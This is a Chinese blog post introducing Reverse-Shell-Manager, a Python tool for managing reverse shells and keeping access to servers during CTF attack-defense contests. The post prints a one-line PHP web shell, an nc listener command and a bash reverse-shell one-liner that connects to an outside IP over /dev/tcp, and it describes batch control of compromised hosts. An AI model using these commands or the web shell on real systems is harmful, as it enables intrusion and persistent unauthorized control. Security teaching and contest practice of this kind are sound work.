美文网首页网络编程魔法Ethical Hackers渗透安全
[工具介绍] 反弹 shell 管理工具

[工具介绍] 反弹 shell 管理工具

作者: 王一航 | 来源:发表于2017-10-24 17:02 被阅读1103次

GitHub 仓库

https://github.com/WangYihang/Reverse-Shell-Manager


介绍一款基于 Python 开发的 反弹 shell 管理工具 Reverse-Shell-Manager

在 CTF线下赛 的时候 , 如果通过 web 或者 pwn 已经拿到了一台服务器的控制权
那么我们可以使用反弹 shell 来对该服务器进行一个长期的权限维持
一般反弹 shell 的时候我们会怎么做呢 ?
比如说这里有一个台服务器可以 RCE 了

<?php system($_GET[c]);?>

如果要反弹的话 , 我们首先要在自己的服务器上监听一个端口 :

nc -l 8888

然后再在目标服务器上执行 :

bash -c 'bash -i >&/dev/tcp/8.8.8.8/8888 0>&1'

这样就能拿到该服务器的 shell 了
但是
一旦链接断开 , 那么就要重新利用漏洞反弹一个新的 shell
这样是不是很麻烦 , 而且还会暴露漏洞是如何被利用的
如果对方抓取了流量进行分析的话 , 很快就会把漏洞补上

而且
一般线下赛很多时候需要一些自动化的脚本来运维和进行权限维持
所以写了一个小工具 , 希望能有用

大概功能就是 :

监听一个端口 , 可以处理所有连接过来的请求
可以对已经连接的主机进行批量管理 (例如一键获取 flag)
保证一台主机不会出现多个连接
对已经下线的主机进行自动检测
image.png

下面有一个简单的介绍视频 :

使用视频

YouTube (详细 推荐看这个)

使用视频 - 点我查看

如果可以给你带来帮助的话 , 可不可以 Star 一下呐 , ヽ(✿゚▽゚)ノ

TODO

1. 端口转发
2. 多层级联 
...

相关文章

  • [工具介绍] 反弹 shell 管理工具

    GitHub 仓库 https://github.com/WangYihang/Reverse-Shell-Man...

  • vue 开发工具安装介绍

    vue 开发工具安装介绍 npm(node包管理工具) 前端项目框架和模块的下载管理工具,类似后台maven工具,...

  • MongoDB开发之 shell

    JavaScript shell MongoDB的命令行工具是一个机遇JavaScript的数据库操作和管理工具。...

  • python学习整理

    1.python包管理介绍 python包管理工具setuptools详解一 python包管理工具setupto...

  • 神奇BPF6 bpftrace搞个小后门

    一 前言 其实我都没怎么用过其他的后门程序,记得在kali系统上的有些攻击工具自动反弹shell,通过shell来...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • shell脚本管理工具

    功能:1、通过简单的命令行添加修改shell脚本。2、增加分类功能,让自己的环境变量分类清晰。3、快速查看脚本。安...

  • 创业公司如何选取缺陷管理工具

    本文章主要是介绍互联网时代新的缺陷管理工具与传统缺陷管理工具,并对创业公司如何选取一个缺陷管理工具提出了一些建议。...

  • Linux Shell 文本处理工具集锦

    Linux Shell 文本处理工具集锦 本文将介绍Linux下使用Shell处理文本时最常用的工具:find、g...

网友评论

  • 9ab95bd6f276:能不能有时间简单的写下实现分析能呢?看到现在项目还没有wiki:joy:
    王一航:嗯嗯 , 昨天一晚上写的...比较仓促...抽时间写吧...其实大部分功能在那个视频里面都有了

本文标题:[工具介绍] 反弹 shell 管理工具

本文链接:https://www.haomeiwen.com/subject/wslxpxtx.html